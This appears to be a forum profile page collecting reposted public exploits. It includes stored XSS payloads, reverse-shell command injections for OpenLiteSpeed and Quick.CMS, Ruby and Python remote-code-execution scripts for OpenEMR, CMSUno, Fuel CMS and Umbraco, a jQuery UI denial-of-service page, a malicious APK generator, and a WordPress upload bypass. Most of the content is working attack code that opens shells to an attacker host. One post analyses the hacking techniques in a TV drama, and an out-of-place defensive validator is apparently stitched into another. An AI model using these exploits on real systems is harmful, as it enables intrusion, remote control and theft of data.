HireHackking

Everything posted by HireHackking

  1. # Exploit Title: EgavilanMedia PHPCRUD 1.0 - 'Full Name' Stored Cross Site Scripting
# Exploit Author: Mahendra Purbia
# Vendor Homepage: http://egavilanmedia.com
# Software Link: https://egavilanmedia.com/crud-operation-with-php-mysql-bootstrap-and-dompdf/
# Version: 1.0
# Tested on: Windows 10

Vulnerable Parameters: Full Name

Steps to reproduce:
1. Go to http://localhost/PHPCRUD/
2. Now click on "add new record" and fill in the details (in the first name field use: "><svg onload=alert(1)// )
3. Now reload the page and you will see that our XSS payload executed. It is a stored XSS.
  2. # Exploit Title: Openlitespeed WebServer 1.7.8 - Command Injection (Authenticated)
# Date: 26/1/2021
# Exploit Author: cmOs - SunCSR
# Vendor Homepage: https://openlitespeed.org/
# Software Link: https://openlitespeed.org/kb/install-from-binary/
# Version: 1.7.8
# Tested on: Windows 10

Step 1: Log in to the dashboard using the Administrator account.
Step 2: Access Server Configuration > External App > Command
Step 3: Set the "Start By Server *" value to "Yes (Through CGI Daemon)"
Step 4: Inject the payload "fcgi-bin/lsphp5/../../../../../bin/bash -c 'bash -i >& /dev/tcp/127.0.0.1/1234 0>&1'" into the "Command" value
Step 5: Graceful Restart

[POC]

POST /view/confMgr.php HTTP/1.1
Host: target:7080
Connection: close
Content-Length: 579
Accept: text/html, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://target:7080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://target:7080/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: LSUI37FE0C43B84483E0=b8e3df9c8a36fc631dd688accca82aee; litespeed_admin_lang=english; LSID37FE0C43B84483E0=W7zzfuEznhk%3D; LSPA37FE0C43B84483E0=excYiZbpUS4%3D

name=lsphp&address=uds%3A%2F%2Ftmp%2Flshttpd%2Flsphp.sock&note=&maxConns=10&env=PHP_LSAPI_CHILDREN%3D10%0D%0ALSAPI_AVOID_FORK%3D200M&initTimeout=60&retryTimeout=0&persistConn=1&pcKeepAliveTimeout=&respBuffer=1&autoStart=2&path=fcgi-bin%2Flsphp5%2F..%2F..%2F..%2F..%2F..%2Fbin%2Fbash+-c+'bash+-i+%3E%26+%2Fdev%2Ftcp%2F192.168.17.52%2F1234+0%3E%261'&backlog=100&instances=0&extUser=&extGroup=&umask=&runOnStartUp=3&extMaxIdleTime=&priority=0&memSoftLimit=2047M&memHardLimit=2047M&procSoftLimit=1400&procHardLimit=1500&a=s&m=serv&p=ext&t=A_EXT_LSAPI&r=lsphp&tk=0.08677800+1611561077
  3. # Title: OpenEMR 5.0.1 - Remote Code Execution (Authenticated) (2)
# Exploit Author: Alexandre ZANNI
# Date: 2020-07-16
# Vendor Homepage: https://www.open-emr.org/
# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz
# Dockerfile: https://github.com/haccer/exploits/blob/master/OpenEMR-RCE/Dockerfile
# Version: < 5.0.1 (Patch 4)
# Tested on: Ubuntu 18.04, OpenEMR Version 5.0.1.3
# References: https://www.exploit-db.com/exploits/48515

#!/usr/bin/env ruby

require 'httpclient'
require 'docopt'

shell_name = 'shell4.php'
user = 'openemr_admin'
password = 'xxxxxx'
payload = 'php/reverse_php'
lhost = '10.10.15.201'
lport = 8888

doc = <<~DOCOPT
  OpenEMR <= 5.0.1 - (Authenticated) Remote Code Execution

  Usage:
    #{__FILE__} manual --root-url <url> --shell <filename> --user <username> --password <password> [--debug]
    #{__FILE__} semi-auto --root-url <url> --user <username> --password <password> --payload <payload> --lhost <host> --lport <port> [--debug]
    #{__FILE__} auto --root-url <url> --user <username> --password <password> --lhost <host> --lport <port> [--debug]
    #{__FILE__} -H | --help

  Options:
    -r <url>, --root-url <url>            Root URL (base path) including HTTP scheme, port and root folder
    -s <filename>, --shell <filename>     Filename of the PHP reverse shell payload
    -u <username>, --user <username>      Username of the admin
    -p <password>, --password <password>  Password of the admin
    -m <payload>, --payload <payload>     Metasploit PHP payload
    -h <host>, --lhost <host>             Reverse shell local host
    -t <port>, --lport <port>             Reverse shell local port
    --debug                               Display arguments
    -H, --help                            Show this screen

  Examples:
    #{__FILE__} manual -r http://example.org/openemr -s myRevShell.php -u admin -p pass123
    #{__FILE__} semi-auto -r http://example.org:8080/openemr -u admin_emr -p qwerty2020 -m 'php/reverse_php' -h 10.0.0.2 -t 8888
    #{__FILE__} auto -r https://example.org:4443 -u admin_usr -p rock5 -h 192.168.0.2 -t 9999
DOCOPT

begin
  args = Docopt.docopt(doc)
  pp args if args['--debug']

  if args['manual']
    shell_name = File.basename(args['--shell'])
    shell_path = args['--shell']
  else
    shell_name = "tmp#{rand(1000)}.php"
    shell_path = shell_name
  end

  if args['semi-auto']
    payload = args['--payload']
  else
    payload = 'php/reverse_php'
  end

  # Authentication data
  uri_1 = URI("#{args['--root-url']}/interface/main/main_screen.php?auth=login&site=default")
  data_1 = {
    'new_login_session_management' => '1',
    'authProvider' => 'Default',
    'authUser' => args['--user'],
    'clearPass' => args['--password'],
    'languageChoice' => '1'
  }

  # Reverse shell data
  unless args['manual']
    puts "[+] Generating the reverse shell payload: #{shell_name}"
    %x(msfvenom -p #{payload} LHOST=#{args['--lhost']} LPORT=#{args['--lport']} -f raw > #{shell_name})
  end
  data_2 = {
    'site' => 'default',
    'mode' => 'save',
    'docid' => shell_name,
    'content' => File.read(shell_path)
  }
  uri_2 = URI("#{args['--root-url']}/portal/import_template.php?site=default")
  uri_3 = URI("#{args['--root-url']}/portal/#{shell_name}")

  clnt = HTTPClient.new

  puts '[+] Authenticating'
  clnt.post(uri_1, data_1)

  puts '[+] Uploading the reverse shell'
  clnt.post(uri_2, data_2)

  puts "[+] Executing the reverse shell: #{args['--root-url']}/portal/#{shell_name}"
  clnt.get(uri_3)
rescue Docopt::Exit => e
  puts e.message
end
  4. # Exploit Title: CMSUno 1.6.2 - 'lang/user' Remote Code Execution (Authenticated)
# Google Dorks:
#   inurl:uno/central.php
#   inurl:uno/config.php
#   inurl:uno.php intitle:"CMSUno - Login"
# Exploit Author: noraj (Alexandre ZANNI) for SEC-IT (https://secit.fr) https://www.exploit-db.com/?author=10066
# Vendor Homepage: https://www.boiteasite.fr/cmsuno.html
# Software Link: https://github.com/boiteasite/cmsuno/archive/1.6.2.tar.gz
# Version: 1.6.1, 1.6.2
# Tested on: docker image: php:7.4-apache (Debian buster)
# CVE : CVE-2020-25557 & CVE-2020-25538

# Vulnerabilities
## Discoverer: Fatih Çelik
## Discoverer website: https://fatihhcelik.blogspot.com
## Vulnerability 1:
##   Title: CMSUno 1.6.2 - 'user' Remote Code Execution (Authenticated)
##   CVE: CVE-2020-25557
##   References: https://fatihhcelik.blogspot.com/2020/09/cmsuno-162-remote-code-execution.html
## Vulnerability 2:
##   Title: CMSUno 1.6.2 - 'lang' Remote Code Execution (Authenticated)
##   CVE: CVE-2020-25538
##   References: https://fatihhcelik.blogspot.com/2020/09/cmsuno-162-remote-code-execution_30.html

#!/usr/bin/env ruby

require 'httpclient'
require 'docopt'

# username = 'cmsuno'
# password = '654321'
# root_url = 'http://localhost:5000/'
# command = 'pwd'

doc = <<~DOCOPT
  CMSUno 1.6.1 <= 1.6.2 - Remote Code Execution (Authenticated)

  Usage:
    #{__FILE__} -r <url> -c <cmd> [-u <username>] [-p <password>] [-t <tech>] [--debug]
    #{__FILE__} -H | --help

  Options:
    -r <url>, --root-url <url>        Root URL (base path) including HTTP scheme, port and root folder
    -u <username>, --user <username>  User name (if not default: cmsuno)
    -p <password>, --pass <password>  User password (if not default: 654321)
    -c <cmd>, --command <cmd>         Command to execute on the target
    -t <tech>, --technique <tech>     Technique: exploiting 'user' param (default, with output) or 'lang' param (blind)
    --debug                           Display arguments
    -h, --help                        Show this screen

  Examples:
    #{__FILE__} -r http://example.org -c id
    #{__FILE__} -r https://example.org:5000/cmsuno -c 'touch hackproof' -u john -p admin1234 -t lang
DOCOPT

# Get anti-CSRF token
def get_unox(client, auth_status)
  print '[*] Fetching anti-CSRF token: '
  res = client.get(LOGIN_URL)
  case auth_status
  when false
    regexp = /name="unox" value="([a-f0-9]{32}?)"/
  when true
    regexp = /Unox='([a-f0-9]{32}?)'/
  end
  token = regexp.match(res.body).captures[0].chomp
  puts token
  return token
end

def login(client, user, pass)
  data = {
    'unox' => get_unox(client, false),
    'user' => user,
    'pass' => pass,
  }
  puts '[*] Logging in'
  res = client.post(LOGIN_URL, data)
  return res.body
end

def exploit(client, user, pass, cmd, tech)
  payload = "#{user}\";$pass='#{pass}';system('#{cmd}');?>// "
  case tech
  when 'user'
    data = "action=sauvePass&unox=#{get_unox(client, true)}&user0=#{user}&pass0=#{pass}&user=#{payload}&pass=#{pass}&lang=en"
  when 'lang'
    data = "action=sauvePass&unox=#{get_unox(client, true)}&user0=&pass0=&user=&pass=&lang=#{payload}"
  else
    raise 'Wrong exploitation technique argument value'
  end
  headers = { 'X-Requested-With' => 'XMLHttpRequest' }
  #client.proxy = 'http://localhost:8080'
  puts "[*] Starting exploitation, using '#{tech}' param technique"
  client.post(VULNERABLE_URL, data, headers)
  # Login again to trigger uno/password.php
  clnt2 = HTTPClient.new
  return login(clnt2, user, pass).lines[..-2].join
end

begin
  args = Docopt.docopt(doc)
  pp args if args['--debug']

  username = args['--user'] || 'cmsuno'
  password = args['--pass'] || '654321'
  technique = args['--technique'] || 'user'
  LOGIN_URL = "#{args['--root-url']}/uno.php"
  VULNERABLE_URL = "#{args['--root-url']}/uno/central.php"

  clnt = HTTPClient.new
  login(clnt, username, password)
  output = exploit(clnt, username, password, args['--command'], technique)
  print '[*] Command output:'
  case technique
  when 'user'
    puts "\n#{output}"
  when 'lang'
    puts ' blind RCE, no output with this exploitation technique'
  end
rescue Docopt::Exit => e
  puts e.message
end
  5. This article only analyzes the technologies involved in film and television dramas, and does not explain the plot in detail. If you are interested, you can check it out.
PS: The technical analysis follows the plot order (episodes 1~4).

At the beginning of the TV series, the first attack technique shown is a malicious power bank. It seems that a power bank is used to charge the phone, but during the charging process, the user's information is obtained.
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/1_20220915125414.png
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/2_20220915125944.png
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/3_20220915130038.png

Implementation principle
This method was involved in my previous article 《利用树莓派监控女盆友手机》. It is actually very simple: it uses the adb command to obtain the phone's information. Of course, you can also use the adb command to install a shell. It is easy to implement; just turn on the phone's developer options first. But in reality, the developer option is turned off by default, so it would not be possible in the situation shown on television.

Information collection
Information collection based on WeChat Moments
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/4_20220915130543.png
Ten posts in the circle of friends (Moments) can be seen by non-friends. Check the latest updates in Moments and get relevant information about the other party. In addition, it was speculated that the heroine's husband was cheating. My cousin suggests that unless it is necessary for work, try to turn off this function in WeChat.

Information collection based on WeChat Steps
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/5_20220915131352.png
Through WeChat Steps, can you tell what someone is doing right now? If you just woke up at 8 o'clock in the morning and your friend's step count has already reached 5,000, it means that he is very likely out running and exercising.

Information collection based on phishing links
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/6_20220915131541.png
Similar articles have also been written in my cousin's previous posts. Through the probe, you can simply obtain the target's IP address, GPS information, photos, recordings, etc. However, as the security of mobile phones improves, there will be pop-up prompts.

Using Baidu Netdisk to back up data
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/7_20220915131932.png
This is often encountered in life. Moreover, after installing Baidu Netdisk, backing up the address book and other information is enabled by default. You can give it a try! (It is best to replace the avatar too, so that it looks real.)

Using Didi to share your itinerary
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/8_20220915132245.png
Through the above plan, the protagonist successfully obtained the other party's mobile phone number and found the related account through WeChat. Of course, the network security expert's computer was infected.
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/11_20220915132907.png

Cracking the drive letter
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/14_20220915134645.png
Of course, the director gave away the password here. If the password were as complex as in reality, it would probably not be cracked by the time the drama ended.

Controlling the Internet cafe network
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/15_20220915140409.png
This should be managed using operation and maintenance apps or mini programs. Not very difficult.

Applications of social engineering
Get useful information about the other party by picking through garbage. Therefore, in daily life, if order slips such as express delivery and takeaway receipts are not disposed of, they will cause a certain amount of information leakage.
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/16_20220915141013.png
Through the other party's account information, enumerate other accounts, such as Tieba, Weibo, and QQ Zone, to obtain the other party's relevant personal information.
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/17_20220915141642.png

WiFi probe
Long ago, CCTV 315 exposed cases of WiFi probes stealing user information. The principle is that when the user's mobile phone wireless LAN is turned on, it sends a signal to the surrounding area to find wireless networks. Once the probe box discovers this signal, it can quickly identify the user's mobile phone MAC address, convert it into an IMEI number, and then convert that into a mobile phone number. Therefore, some companies place this small box in shopping malls, supermarkets, convenience stores, office buildings, etc. and collect personal information without the user's knowledge, even big-data personal information such as marital status, education level, and income.
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/18_20220915150519.png

Android shell
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/21_20220915151414.png
As can be seen from the video, these are the very basic msf commands for controlling Android. But being able to directly manipulate the phone's editing is a bit exaggerated.
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/22_20220915151649.png

WiFi phishing
Use fluxion for WiFi phishing.
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/23_20220915154038.png

PS: Episodes 4-8; only the technology in the drama is analyzed, and the plot and characters are not explained.

Then, in order to obtain data from the fraud group, I sneaked into the computer room to download the server data.
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/1_20220916135536.gif
The software used here should be XFTP. This is also a physical attack!

Physical attack
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/R-C_20220916160749.jpg
The so-called physical attack means that an attacker cannot find relevant vulnerabilities at the software or system level. If the target cannot be won for the time being, they go into the field to investigate and sneak into the target through social engineering and other methods to attack. This kind of attack is the most deadly.
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/2_20220916141442.gif

Tools used in the network security competition
In the previous shot, it should be using Owasp to scan the target website for vulnerabilities. To be honest, the page has not moved; I don't know what was scanned!
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/111_20220916142109.png
After entering the second level of protection, the third game should still be the msf interface. The msf configuration parameters are set, but there has been no exploit, and I don't know what it is waiting for.
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/123_20220916142440.png
When the countdown reaches three minutes, the sqlmap injection should have started.
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/145_20220916142633.png
As can be seen from the video, the command used is:
sqlmap -r 1.txt --batch --level 5 -v --current-user
The use of sqlmap has been mentioned more in previous articles. The above command should be used to obtain the current system user through POST injection.

Parameter interpretation:
-r 1.txt: The target request data is stored in a txt file. Generally, Burp is used to capture packets and save them as txt.
--batch: The user does not need to enter YES or NO during execution; the default value prompted by sqlmap will be used so that it runs continuously.
--level: Risk level, default is 1. When level is 5, many payloads will be tested, and efficiency will be reduced.
--current-user: Gets the current username.

Summary
The network security tools involved in the TV series are all common network security knowledge we usually have. The drama has expanded on them slightly, but from the perspective of the plot, it is still very good. Especially while popularizing network security knowledge to the public, it closely links topics relevant to people such as online water armies, online fraud, pig-butchering scams, online loans, etc. At the end of the video, some network security knowledge is popularized for everyone, which is worth recommending!
  6. # Title: Fuel CMS 1.4.1 - Remote Code Execution (2)
# Exploit Author: Alexandre ZANNI
# Date: 2020-11-14
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Version: <= 1.4.1
# Tested on: Ubuntu 16.04
# CVE : CVE-2018-16763
# References: https://www.exploit-db.com/exploits/47138

#!/usr/bin/env ruby

require 'httpclient'
require 'docopt'

# dirty workaround to ignore Max-Age
# https://github.com/nahi/httpclient/issues/242#issuecomment-69013932
$VERBOSE = nil

doc = <<~DOCOPT
  Fuel CMS 1.4 - Remote Code Execution

  Usage:
    #{__FILE__} <url> <cmd>
    #{__FILE__} -h | --help

  Options:
    <url>         Root URL (base path) including HTTP scheme, port and root folder
    <cmd>         The system command to execute
    -h, --help    Show this screen

  Examples:
    #{__FILE__} http://example.org id
    #{__FILE__} https://example.org:8443/fuelcms 'cat /etc/passwd'
DOCOPT

def exploit(client, root_url, cmd)
  url = root_url + "/fuel/pages/select/?filter='%2Bpi(print(%24a%3D'system'))%2B%24a('#{cmd}')%2B'"
  res = client.get(url)
  /system(.+?)<div/mx.match(res.body).captures[0].chomp
end

begin
  args = Docopt.docopt(doc)
  clnt = HTTPClient.new
  puts exploit(clnt, args['<url>'], args['<cmd>'])
rescue Docopt::Exit => e
  puts e.message
end
  7. # Exploit Title: jQuery UI 1.12.1 - Denial of Service (DoS)
# Date: 20 Jan, 2021
# Exploit Author: Rafael Cintra Lopes
# Vendor Homepage: https://jqueryui.com/
# Software Link: https://jqueryui.com/download/
# Version: <= 1.12.1
# CVE : CVE-2020-28488

<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>DoS - jQuery UI 1.12.1</title>
</head>
<body>
  <h2>DoS - jQuery UI 1.12.1</h2>
  <div>
    <button onclick="exploit()">Exploit</button>
  </div>
  <p>PoC by Rafael Cintra Lopes</p>
  <script src="https://code.jquery.com/jquery-3.5.1.min.js" integrity="sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0=" crossorigin="anonymous"></script>
  <script src="https://code.jquery.com/ui/1.12.1/jquery-ui.min.js" integrity="sha256-VazP97ZCwtekAsvgPBSUwPFKdrwD3unUfSGVYrahUqU=" crossorigin="anonymous"></script>
  <script>
    function exploit(){
      for (var i = 0; i < 10; i++) {
        $("div").dialog({title:'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'});
      }
    }
  </script>
</body>
</html>
  8. # Exploit Title: Umbraco CMS 7.12.4 - Remote Code Execution (Authenticated)
# Date: 2020-03-28
# Exploit Author: Alexandre ZANNI (noraj)
# Based on: https://www.exploit-db.com/exploits/46153
# Vendor Homepage: http://www.umbraco.com/
# Software Link: https://our.umbraco.com/download/releases
# Version: 7.12.4
# Category: Webapps
# Tested on: Windows IIS
# Example: python exploit.py -u admin@example.org -p password123 -i 'http://10.0.0.1' -c ipconfig

import requests
import re
import argparse
from bs4 import BeautifulSoup

parser = argparse.ArgumentParser(prog='exploit.py',
    description='Umbraco authenticated RCE',
    formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=80))
parser.add_argument('-u', '--user', metavar='USER', type=str,
    required=True, dest='user', help='username / email')
parser.add_argument('-p', '--password', metavar='PASS', type=str,
    required=True, dest='password', help='password')
parser.add_argument('-i', '--host', metavar='URL', type=str, required=True,
    dest='url', help='root URL')
parser.add_argument('-c', '--command', metavar='CMD', type=str,
    required=True, dest='command', help='command')
parser.add_argument('-a', '--arguments', metavar='ARGS', type=str,
    required=False, dest='arguments', help='arguments', default='')

args = parser.parse_args()

# Payload
payload = """\
<?xml version="1.0"?><xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" \
xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">\
<msxsl:script language="C#" implements-prefix="csharp_user">public string xml() { string cmd = "%s"; \
System.Diagnostics.Process proc = new System.Diagnostics.Process(); proc.StartInfo.FileName = "%s"; \
proc.StartInfo.Arguments = cmd; proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; \
proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } </msxsl:script>\
<xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/> </xsl:template> </xsl:stylesheet>\
""" % (args.arguments, args.command)

login = args.user
password = args.password
host = args.url

# Process Login
url_login = host + "/umbraco/backoffice/UmbracoApi/Authentication/PostLogin"
loginfo = { "username": login, "password": password}
s = requests.session()
r2 = s.post(url_login,json=loginfo)

# Go to vulnerable web page
url_xslt = host + "/umbraco/developer/Xslt/xsltVisualize.aspx"
r3 = s.get(url_xslt)

soup = BeautifulSoup(r3.text, 'html.parser')
VIEWSTATE = soup.find(id="__VIEWSTATE")['value']
VIEWSTATEGENERATOR = soup.find(id="__VIEWSTATEGENERATOR")['value']
UMBXSRFTOKEN = s.cookies['UMB-XSRF-TOKEN']
headers = {'UMB-XSRF-TOKEN': UMBXSRFTOKEN}
data = { "__EVENTTARGET": "", "__EVENTARGUMENT": "", "__VIEWSTATE": VIEWSTATE,
    "__VIEWSTATEGENERATOR": VIEWSTATEGENERATOR, "ctl00$body$xsltSelection": payload,
    "ctl00$body$contentPicker$ContentIdValue": "", "ctl00$body$visualizeDo": "Visualize+XSLT" }

# Launch the attack
r4 = s.post(url_xslt, data=data, headers=headers)

# Filter output
soup = BeautifulSoup(r4.text, 'html.parser')
CMDOUTPUT = soup.find(id="result").getText()
print(CMDOUTPUT)
  9. # Exploit Title: Metasploit Framework 6.0.11 - msfvenom APK template command injection
# Exploit Author: Justin Steven
# Vendor Homepage: https://www.metasploit.com/
# Software Link: https://www.metasploit.com/
# Version: Metasploit Framework 6.0.11 and Metasploit Pro 4.18.0
# CVE : CVE-2020-7384

#!/usr/bin/env python3

import subprocess
import tempfile
import os
from base64 import b64encode

# Change me
payload = 'echo "Code execution as $(id)" > /tmp/win'

# b64encode to avoid badchars (keytool is picky)
payload_b64 = b64encode(payload.encode()).decode()
dname = f"CN='|echo {payload_b64} | base64 -d | sh #"

print(f"[+] Manufacturing evil apkfile")
print(f"Payload: {payload}")
print(f"-dname: {dname}")
print()

tmpdir = tempfile.mkdtemp()
apk_file = os.path.join(tmpdir, "evil.apk")
empty_file = os.path.join(tmpdir, "empty")
keystore_file = os.path.join(tmpdir, "signing.keystore")
storepass = keypass = "password"
key_alias = "signing.key"

# Touch empty_file
open(empty_file, "w").close()

# Create apk_file
subprocess.check_call(["zip", "-j", apk_file, empty_file])

# Generate signing key with malicious -dname
subprocess.check_call(["keytool", "-genkey", "-keystore", keystore_file, "-alias", key_alias, "-storepass", storepass,
                       "-keypass", keypass, "-keyalg", "RSA", "-keysize", "2048", "-dname", dname])

# Sign APK using our malicious dname
subprocess.check_call(["jarsigner", "-sigalg", "SHA1withRSA", "-digestalg", "SHA1", "-keystore", keystore_file,
                       "-storepass", storepass, "-keypass", keypass, apk_file, key_alias])

print()
print(f"[+] Done! apkfile is at {apk_file}")
print(f"Do: msfvenom -x {apk_file} -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o /dev/null")
  10. # Exploit Title: WordPress Plugin SuperForms 4.9 - Arbitrary File Upload to Remote Code Execution
# Exploit Author: ABDO10
# Date : Jan - 28 - 2021
# Google Dork : inurl:"/wp-content/plugins/super-forms/"
# Vendor Homepage : https://renstillmann.github.io/super-forms/#/
# Version : All (<= 4.9.X)

# data in http request :

POST /wp-content/plugins/super-forms/uploads/php/ HTTP/1.1   <=== exploit end point
Host: localhost
User-Agent: UserAgent
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------423513681827540048931513055996
Content-Length: 7058
Origin: localhost
Connection: close
Referer: localhost
Cookie:

-----------------------------423513681827540048931513055996
Content-Disposition: form-data; name="accept_file_types"

jpg|jpeg|png|gif|pdf|JPG|JPEG|PNG|GIF|PDF   <======= inject extension (|PHP4) to validate file to upload
-----------------------------423513681827540048931513055996
Content-Disposition: form-data; name="max_file_size"

8000000
-----------------------------423513681827540048931513055996
Content-Disposition: form-data; name="image_library"

0
-----------------------------423513681827540048931513055996
Content-Disposition: form-data; name="files[]"; filename="filename.(extension)"   <==== inject code extension (.php4) for example
Content-Type: application/pdf

Evil codes to be uploaded
-----------------------------423513681827540048931513055996--

# Uploaded Malicious File can be Found in : /wp-content/uploads/superforms/2021/01/<id>/filename.php4
# You can get <id> from the server reply.
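As an added defensive example (not the plugin's code and not part of the advisory), a model of the weak check the advisory describes, an allowlist taken from the request's own accept_file_types field, next to a hardened check that uses a server-owned allowlist and refuses executable extensions anywhere in the name. The function names and both extension lists are assumptions made for the example.

```python
import re
from typing import Iterable, List, Tuple

# Allowlist the server itself owns. Constructed for this example; it is not
# the plugin's own configuration.
SERVER_ALLOWED_EXTENSIONS = frozenset({"jpg", "jpeg", "png", "gif", "pdf"})

# Extensions a web server with a PHP handler may execute regardless of what
# the client claims the file is. Constructed list for illustration only.
EXECUTABLE_EXTENSIONS = frozenset({"php", "php3", "php4", "php5", "php7", "phtml", "phar"})


def weak_is_allowed(filename: str, client_accept_file_types: str) -> bool:
    """Model of the weak pattern: the allowlist comes from the request itself.

    Appending '|PHP4' to accept_file_types is enough for 'filename.PHP4' to pass.
    """
    pattern = re.compile(r"\.(" + client_accept_file_types + r")$")
    return bool(pattern.search(filename))


def hardened_is_allowed(filename: str, client_accept_file_types: str = "") -> Tuple[bool, str]:
    """Decide with the server-owned allowlist; client_accept_file_types is ignored.

    Returns (allowed, reason) so a handler can log why an upload was refused.
    """
    # Drop any directory part smuggled into the filename before looking at it.
    name = filename.replace("\\", "/").rsplit("/", 1)[-1]
    if not name or name.startswith("."):
        return False, "empty or hidden filename"
    parts = name.lower().split(".")
    if len(parts) < 2:
        return False, "no extension"
    exts = parts[1:]
    # Every extension component counts: 'shell.php.jpg' can still reach a PHP
    # handler under some server configurations, so refuse it outright.
    for ext in exts:
        if ext in EXECUTABLE_EXTENSIONS:
            return False, f"executable extension '{ext}'"
    if exts[-1] not in SERVER_ALLOWED_EXTENSIONS:
        return False, f"extension '{exts[-1]}' not in server allowlist"
    return True, "ok"


def compare(cases: Iterable[Tuple[str, str]]) -> List[Tuple[str, bool, bool]]:
    """Run both checks over (filename, client_accept_file_types) pairs."""
    return [(fn, weak_is_allowed(fn, acc), hardened_is_allowed(fn, acc)[0]) for fn, acc in cases]


# Constructed inputs mirroring the request in the advisory above.
NORMAL_ACCEPT = "jpg|jpeg|png|gif|pdf|JPG|JPEG|PNG|GIF|PDF"
INJECTED_ACCEPT = NORMAL_ACCEPT + "|PHP4"
CASES = [
    ("photo.jpg", NORMAL_ACCEPT),        # legitimate upload: both checks accept
    ("filename.PHP4", INJECTED_ACCEPT),  # the advisory's case: weak accepts, hardened refuses
    ("shell.php.jpg", NORMAL_ACCEPT),    # double extension: weak accepts, hardened refuses
    ("../../evil.pdf", NORMAL_ACCEPT),   # path part is stripped, extension is fine
]

if __name__ == "__main__":
    for fn, weak, hard in compare(CASES):
        print(f"{fn:20} weak={weak!s:5} hardened={hard}")
```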
  11. # Title: BloofoxCMS 0.5.2.1 - 'text' Stored Cross Site Scripting
# Exploit Author: LiPeiYi
# Date: 2020-12-18
# Vendor Homepage: https://www.bloofox.com/
# Software Link: https://github.com/alexlang24/bloofoxCMS/releases/tag/0.5.2.1
# Version: 0.5.1.0 - 0.5.2.1
# Tested on: windows 10

Vulnerable page: /admin/include/inc_content_articles.php

Steps to reproduce:
1: Log in with a valid username and password. Navigate to the "articles" tab on the left-hand side.
2: Add a new post, then add the payload "<img src=# onerror=alert('xss')>" in the "text" parameter and click on the save button. The post is saved successfully.
3: Now the XSS is stored and triggers every time, and the attacker can steal authenticated users' cookies.
  12. # Exploit Title: Quick.CMS 6.7 - Remote Code Execution (Authenticated)
# Date: 2020-12-28
# Exploit Author: mari0x00
# Vendor Homepage: https://opensolution.org/
# Software Link: https://opensolution.org/download/?sFile=Quick.Cms_v6.7-pl.zip
# Description: https://secator.pl/index.php/2021/01/28/cve-2020-35754-authenticated-rce-in-quick-cms-and-quick-cart/
# Version: <= 6.7
# CVE : CVE-2020-35754

#!/usr/bin/python3

import requests
import sys
from termcolor import colored
from time import sleep

print(colored('''###########################################################''',"red"))
print(colored('''######    Quick.CMS authenticated RCE by mari0x00    #######''',"red"))
print(colored('''###########################################################''',"red"))
print("")

if len(sys.argv) != 6:
    print((colored("[~] Usage : python3 quickpwn.py <url> <username> <password> <IP> <PORT>","red")))
    print((colored("[~] Example: python3 quickpwn.py http://192.168.101.105/quick.cms/ john@example.com pass123 192.168.101.101 4444","red")))
    exit()

url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
IP = sys.argv[4]
PORT = sys.argv[5]

#Start session
s = requests.Session()
headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0'}

#Authenticate
print((colored("[+] Attempting user login","blue")))
login_data = {
    "sEmail": username,
    "sPass": password,
    "bAcceptLicense": "1",
    "iAcceptLicense": "true"
}
login = s.post(url+"admin.php?p=login", login_data, headers=headers)
sleep(0.5)

#Exploit
print((colored("[+] Adding shell command","blue")))
payload = "Back end\\\"; system('/bin/bash -c \\'bash -i >& /dev/tcp/" + IP + "/" + PORT + " 0>&1\\''); //"
shell = {
    "sOption": "save",
    "Back_end_only": payload
}
exploit = s.post(url+"admin.php?p=languages&sLangEdit=en", shell, headers=headers)
sleep(1)

